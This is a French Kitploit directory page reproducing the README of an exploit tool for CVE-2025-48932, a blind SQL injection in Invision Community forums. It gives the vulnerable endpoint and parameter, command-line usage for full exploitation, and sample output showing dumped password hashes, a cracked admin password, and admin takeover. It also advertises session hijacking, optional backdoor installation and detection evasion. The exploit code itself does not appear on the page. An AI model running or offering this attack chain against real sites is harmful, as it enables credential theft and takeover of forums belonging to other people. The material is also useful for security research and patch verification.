Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna | Kitploit
Outils/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationWeb SecurityPenetration Testing

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

Voir le dépôt
1il y a 18 joursPas encore vérifié

À propos

CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna

Partager

🔓 CVE-2025-48932 - Exploitation d'injection SQL dans Invision Community

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ Aperçu de la vulnérabilité critique

CVE-2025-48932 est une vulnérabilité critique d'injection SQL aveugle non authentifiée découverte dans Invision Community versions ≤ 4.7.20. Cet exploit permet aux attaquants distants de :

  • 🔍 Extraire des informations sensibles de la base de données
  • 👤 Voler les identifiants utilisateurs et les hachages de mots de passe
  • 🔑 Prendre le contrôle des comptes administrateur
  • 🎯 Détourner les sessions utilisateur actives
  • 💻 Obtenir une exécution de code à distance (RCE) via la prise de contrôle du compte admin
  • 📊 Extraire l'intégralité du contenu de la base de données

🎯 Fonctionnalités


📊 Démo et captures d'écran

Exécution de l'exploit

root@kitploit:~
$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

Exemple de sortie JSON

root@kitploit:~
{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 Guide de démarrage rapide

Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# No dependencies to install! Just run it.

Utilisation de base

root@kitploit:~
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only

# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v

# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Save results to custom file
python3 exploit.py -u https://example.com -o results.json

# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10

# Dump all available data
python3 exploit.py -u https://example.com --dump-all

Utilisation avancée

root@kitploit:~
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json

# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug

📋 Prérequis

Configuration système requise

  • Python : 3.6 ou supérieur
  • OS : Linux, Windows, macOS (tout OS avec Python)
  • Mémoire : Minimale (~50 Mo de RAM)
  • Stockage : ~100 Ko (exploit uniquement)

Dépendances

root@kitploit:~
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!

Optionnel (pour le cassage de mots de passe)

  • Wordlist : rockyou.txt ou toute wordlist personnalisée
    root@kitploit:~
    # Download popular wordlist
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ Détails techniques

Emplacement de la vulnérabilité

  • Fichier : /applications/calendar/modules/front/calendar/view.php
  • Méthode : IPS\calendar\modules\front\calendar\view::search()
  • Paramètre : location (entrée fournie par l'utilisateur)
  • Type : Injection SQL aveugle basée sur des booléens

Vecteur d'attaque

root@kitploit:~
GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

Chaîne d'exploitation

  1. Détection : détection d'injection basée sur des booléens
  2. Énumération : extraire la structure de la base de données
  3. Extraction : exfiltrer les données sensibles
  4. Vol d'identifiants : extraire les identifiants utilisateurs
  5. Élévation de privilèges : prise de contrôle du compte administrateur
  6. Détournement de session : voler les sessions actives
  7. Persistance : installer une porte dérobée (optionnel)

Versions de bases de données prises en charge

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 Avis de sécurité et légal

⚠️ AVERTISSEMENT IMPORTANT

Cet outil est destiné uniquement à des fins ÉDUCATIVES et de TEST AUTORISÉ.

En utilisant cet outil, vous acceptez de :

  • L'utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test
  • Ne pas l'utiliser à des fins illégales ou malveillantes
  • Vous conformer à toutes les lois et réglementations applicables
  • Assumer l'entière responsabilité de vos actions

L'accès non autorisé à des systèmes informatiques est illégal et contraire à l'éthique.

Divulgation responsable

  • Éditeur : Invision Community
  • Divulgué : 16 mai 2025
  • Corrigé : version 4.7.21 (27 mai 2025)
  • CVE : CVE-2025-48932 attribué

📚 Documentation

Arguments de l'exploit

Structure du rapport

root@kitploit:~
invision_exploit_report_[timestamp].json
├── target                 # Target URL
├── timestamp              # Exploit timestamp
├── vulnerable             # Vulnerability status
├── database               # Database information
├── databases              # List of databases
├── tables                 # List of tables
├── credentials            # Extracted credentials
├── admin_info             # Admin user information
└── summary                # Exploitation summary

🎯 Cas d'utilisation

Pour les chercheurs en sécurité

  • ✅ Validation de vulnérabilités
  • ✅ Développement de preuves de concept
  • ✅ Évaluation de sécurité
  • ✅ Chasse aux bugs bounty

Pour les testeurs d'intrusion

  • ✅ Tests d'intrusion externes/internes
  • ✅ Opérations d'équipe rouge
  • ✅ Vérification de vulnérabilités
  • ✅ Tests de conformité

Pour les administrateurs système

  • ✅ Audit de sécurité de vos propres systèmes
  • ✅ Vérification des correctifs
  • ✅ Enquête de réponse aux incidents
  • ✅ Évaluation de la posture de sécurité

🐛 Dépannage

Problèmes courants et solutions

Problème : Délai de connexion dépassé

root@kitploit:~
# Solution: Increase timeout or check network
python3 exploit.py -u https://example.com --timeout 60

Problème : Erreurs de certificat SSL

root@kitploit:~
# Solution: Disable SSL verification (not recommended for production)
python3 exploit.py -u https://example.com --no-verify-ssl

Problème : Limitation de débit détectée

root@kitploit:~
# Solution: Reduce threads and increase delays
python3 exploit.py -u https://example.com -t 2 --delay 2

Problème : Aucun paramètre vulnérable trouvé

root@kitploit:~
# Solution: Ensure calendar app is installed and GeoLocation is enabled
# Check: /applications/calendar/modules/front/calendar/view.php exists

📖 Références

Ressources officielles

  • CVE-2025-48932
  • Invision Community
  • Bulletin de sécurité Invision
  • Avis original

Références techniques

  • OWASP SQL Injection
  • Injection SQL aveugle
  • Documentation MySQL

CVE associées

  • CVE-2024-xxxxx (Vulnérabilités Invision précédentes)
  • CVE-2023-xxxxx (CVE liées aux plateformes communautaires)

🤝 Contribuer

Nous accueillons volontiers les contributions ! Veuillez consulter nos Directives de contribution.

Comment contribuer

  1. Fork du dépôt
  2. Créer une branche de fonctionnalité (git checkout -b feature/AmazingFeature)
  3. Effectuer un commit des modifications (git commit -m 'Add some AmazingFeature')
  4. Pousser vers la branche (git push origin feature/AmazingFeature)
  5. Ouvrir une Pull Request

Signaler des problèmes

  • 🐛 Signaler un bug
  • 💡 Demande de fonctionnalité
  • 🔒 Problème de sécurité

👨‍💻 Auteur

Sudeepa Wanigarathna

Chercheur en sécurité et chasseur de bugs bounty

  • 🌐 GitHub
  • 🐦 Twitter
  • 💼 LinkedIn
  • 📧 E-mail

📄 Licence

Ce projet est sous licence MIT — voir le fichier LICENSE pour plus de détails.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ Montrez votre soutien

Si ce projet vous a aidé ou vous a intéressé :

  • ⭐ Star ce dépôt
  • 🔗 Partagez avec votre réseau
  • 📢 Mentionnez-le dans vos recherches en sécurité
  • 🤝 Contribuez à son amélioration

🙏 Remerciements

Sudeepa Wanigarathna

Chercheur en cybersécurité | Ingénieur logiciel | Ingénieur CTF

Ce projet est fourni pour la recherche en sécurité, l'analyse défensive et les tests d'intrusion autorisés. Les utilisateurs sont responsables du respect de toutes les lois applicables et de l'obtention d'une autorisation appropriée avant toute utilisation.

Télécharger l’outil
FonctionnalitéDescriptionStatut
🚀 Zéro dépendanceBibliothèque standard Python pure - aucune installation pip requise✅
⚡ MultithreadéExtraction de données ultra-rapide avec threads configurables✅
🤖 Entièrement automatiséChaîne d'exploitation complète, de la détection au rapport✅
👑 Prise de contrôle adminDétournement de session et élévation de privilèges✅
🔑 Extraction d'identifiantsExtraire les utilisateurs, les hachages de mots de passe, les e-mails✅
🔓 Cassage de mots de passeCassage de hachages intégré avec prise en charge des wordlists✅
📋 Rapports JSONSortie structurée pour l'analyse et la documentation✅
🔌 Prise en charge des proxysIntégration Burp Suite et proxy personnalisé✅
🎨 Sortie coloréeSortie terminal élégante avec indicateurs de progression✅
🛡️ Limitation de débitDélais intégrés pour éviter la détection✅
ArgumentDescriptionExemple
-u, --urlURL cible (requis)-u https://example.com
-p, --proxyURL du proxy-p http://127.0.0.1:8080
-t, --threadsNombre de threads (défaut : 5)-t 10
-o, --outputFichier de sortie pour les résultats-o results.json
-v, --verboseActiver la sortie détaillée-v
--check-onlyVérifier uniquement la vulnérabilité--check-only
--dump-allExtraire toutes les données disponibles--dump-all
--wordlistFichier wordlist pour le cassage--wordlist rockyou.txt